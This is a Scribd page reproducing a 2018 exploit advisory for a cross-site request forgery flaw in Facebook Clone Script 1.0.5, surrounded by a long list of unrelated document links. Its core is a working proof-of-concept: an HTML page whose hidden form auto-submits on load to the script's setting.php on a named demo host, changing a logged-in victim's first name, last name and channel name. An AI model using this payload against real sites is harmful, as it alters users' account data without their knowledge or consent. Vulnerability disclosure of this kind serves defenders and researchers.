Welcome to Scribd!

44800

Uploaded by

0% found this document useful (0 votes)

12 views1 page

Facebook Clone Script version 1.0.5 has a cross-site request forgery (CSRF) vulnerability that allows attackers to easily change a user's information without authentication. The proof of concept involves a hidden form that submits to the script's setting.php page to change first name, last name, and channel name fields when the page loads.

Original Description:

Original Title

44800.txt

Copyright

Available Formats

TXT, PDF, TXT or read online from Scribd

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Report this Document

Copyright:

Available Formats

Download as TXT, PDF, TXT or read online from Scribd

Flag for inappropriate content

0% found this document useful (0 votes)

12 views1 page

44800

Uploaded by

Herisitraka Fabrice Randrianarivo

Copyright:

Available Formats

Download as TXT, PDF, TXT or read online from Scribd

Flag for inappropriate content

Jump to Page

You are on page 1of 1

Search inside document

# Exploit Title: Facebook Clone Script 1.0.

5 - Cross-Site Request Forgery

# Date: 2018-05-29
# Exploit Author: L0RD
# Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/
# Version: 1.0.5
# Tested on: Win 10

# Description :
# Facebook Clone Script 1.0.5 has csrf vulnerability which attacker can
# easily change user information .

# POC :

<html>
<head>
<title>Change information</title>
</head>
<body>
<form action="http://smsemailmarketing.in/demo/fbclone/setting.php"
method="POST">
<input type="hidden" name="fn" value="anything" />
<input type="hidden" name="ln" value="anything" />
<input type="hidden" name="chnname" value="anything" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Examples
Document12 pages
Examples
Sathish
No ratings yet
WebSecurity 2/3
Document91 pages
WebSecurity 2/3
Adzmely Mansor
No ratings yet
Do Not Skip Step: Easiest Facebook Hacking. (TAGLISH)
Document3 pages
Do Not Skip Step: Easiest Facebook Hacking. (TAGLISH)
Kit Lara
No ratings yet
Chapter 3: PHP Form Interactions
Document14 pages
Chapter 3: PHP Form Interactions
Khirulnizam Abd Rahman
No ratings yet
Top 5 Popular Website
Document23 pages
Top 5 Popular Website
James Monsanto
100% (1)
Social Network Integration
Document39 pages
Social Network Integration
Mikhail Joseph Torres
No ratings yet
Lab (3) Session - Diving Into CSRF
Document6 pages
Lab (3) Session - Diving Into CSRF
Mark
No ratings yet
Slus 011.15
Document11 pages
Slus 011.15
septianadiwibowo81
No ratings yet
Aristóteles - Ética A Nicômaco - Livros I-II e V
Document4 pages
Aristóteles - Ética A Nicômaco - Livros I-II e V
barcaro
No ratings yet
Preventing Multiple Submissions of A Form
Document7 pages
Preventing Multiple Submissions of A Form
LALITHA
No ratings yet
Template Lama
Document64 pages
Template Lama
Muh Fjr
No ratings yet
Experiment No. 01 Aim: Write A Program To Perfom Javascript Simple Arithmetic Operations. Program
Document17 pages
Experiment No. 01 Aim: Write A Program To Perfom Javascript Simple Arithmetic Operations. Program
PANKAJ SAHO
No ratings yet
PHP3 PDF
Document11 pages
PHP3 PDF
Sanchit Garg
No ratings yet
Oracle Apex
Document34 pages
Oracle Apex
Manu K Bhagavath
100% (2)
Newspaper
Document1,663 pages
Newspaper
frangelo2181
No ratings yet
51525
Document1 page
51525
LOH ENG HIN
No ratings yet
Using XSS To Bypass CSRF Protection
Document12 pages
Using XSS To Bypass CSRF Protection
Muhammad Adha
No ratings yet
Bryt
Document2 pages
Bryt
Eert
No ratings yet
PDF
Document28 pages
PDF
Aarati Mahato
No ratings yet
Javascript
Document37 pages
Javascript
saalai67
No ratings yet
Club Hack Magazine 04 PDF
Document26 pages
Club Hack Magazine 04 PDF
Alexxs
No ratings yet
Js
Document29 pages
Js
rani
No ratings yet
Viral Script
Document4 pages
Viral Script
LiderEmprendedor
No ratings yet
MPDF
Document12 pages
MPDF
Jose Moises Moises
No ratings yet
Aprendiendo Javascript
Document3 pages
Aprendiendo Javascript
jhosue tom
No ratings yet
HTML Labsheet
Document15 pages
HTML Labsheet
Acharya Krishna
No ratings yet
WPL Mids
Document59 pages
WPL Mids
Talha Mansoor
No ratings yet
Psa5 Technical - Rice in A Box
Document23 pages
Psa5 Technical - Rice in A Box
FRANZ MILLAN DE VERA
No ratings yet
Flask-1 - Python With Naveen PDF
Document20 pages
Flask-1 - Python With Naveen PDF
nandini
100% (1)
Annamalai University
Document26 pages
Annamalai University
Green Zone
No ratings yet
New Text Document
Document13 pages
New Text Document
abababa
No ratings yet
4.1.javascript Introduction
Document12 pages
4.1.javascript Introduction
Prince Jutt
No ratings yet
Book of Tips by Aditya Shende PDF
Document23 pages
Book of Tips by Aditya Shende PDF
venom
No ratings yet
MemeChat Script
Document15 pages
MemeChat Script
Jose Ponce Lopez
No ratings yet
Cs9228 Web Technology Lab Manual
Document90 pages
Cs9228 Web Technology Lab Manual
keerthi_sm18
No ratings yet
Oracle MyLearn
Document742 pages
Oracle MyLearn
Nakhla Al-Hawi
No ratings yet
Assignment 2
Document34 pages
Assignment 2
Stanley Muteranduwa
No ratings yet
Open Social: Google S
Document19 pages
Open Social: Google S
ntisforge
No ratings yet
Bagaimana Cara Kerja Kapal Selam
Document193 pages
Bagaimana Cara Kerja Kapal Selam
Muchamad Khoirul Amin
No ratings yet
Java Script Keygen
Document6 pages
Java Script Keygen
737448 SV
No ratings yet
Assignment5 phpsql-2
Document10 pages
Assignment5 phpsql-2
api-392389144
No ratings yet
Sekrip
Document72 pages
Sekrip
Andy Soeb Andy
No ratings yet
Untitled 1
Document69 pages
Untitled 1
Gusmao Freitas
No ratings yet
How To Redirect With PHP
Document47 pages
How To Redirect With PHP
looklo
No ratings yet
Task 5 - Coursework
Document14 pages
Task 5 - Coursework
Raj Moktan
No ratings yet
F8 Audit and Assurance Int Revision Kit BPP 1
Document280 pages
F8 Audit and Assurance Int Revision Kit BPP 1
julettopey
No ratings yet
Write About Form Handling in PHP?: The Code Below Creates A Simple Registration Form
Document5 pages
Write About Form Handling in PHP?: The Code Below Creates A Simple Registration Form
Jeevankumar Chandu
No ratings yet
Iwt Practical
Document20 pages
Iwt Practical
shubham singh
No ratings yet
Iframe Injection-Totall Overdose
Document24 pages
Iframe Injection-Totall Overdose
Vishal Dwivedi
No ratings yet
XML Based Attacks: Daniel Tomescu
Document25 pages
XML Based Attacks: Daniel Tomescu
devil
No ratings yet
Arlina Redesign
Document54 pages
Arlina Redesign
Rizky
No ratings yet
Php/Mysql Tutorial: Webmonkey
Document10 pages
Php/Mysql Tutorial: Webmonkey
akkisantosh7444
No ratings yet
Web Programming Lab Manual
Document73 pages
Web Programming Lab Manual
Kunal Arora
0% (2)
Javascript
Document37 pages
Javascript
Ebb Tenebroso Judilla
No ratings yet
What About XML
Document83 pages
What About XML
vasilica1234
No ratings yet
Exploiting Misconfigured CORS
Document4 pages
Exploiting Misconfigured CORS
Shahirul Azam
No ratings yet
Quick JavaScript Learning In Just 3 Days: Fast-Track Learning Course
From Everand
Quick JavaScript Learning In Just 3 Days: Fast-Track Learning Course
Vijay K.R.
No ratings yet
Pro jQuery 2.0
From Everand
Pro jQuery 2.0
Adam Freeman
No ratings yet
How to a Developers Guide to 4k: Developer edition, #3
From Everand
How to a Developers Guide to 4k: Developer edition, #3
Xinc Cyberwizard
No ratings yet
Introduction to PHP, Part 4, Second Edition
From Everand
Introduction to PHP, Part 4, Second Edition
Adam Majczak
No ratings yet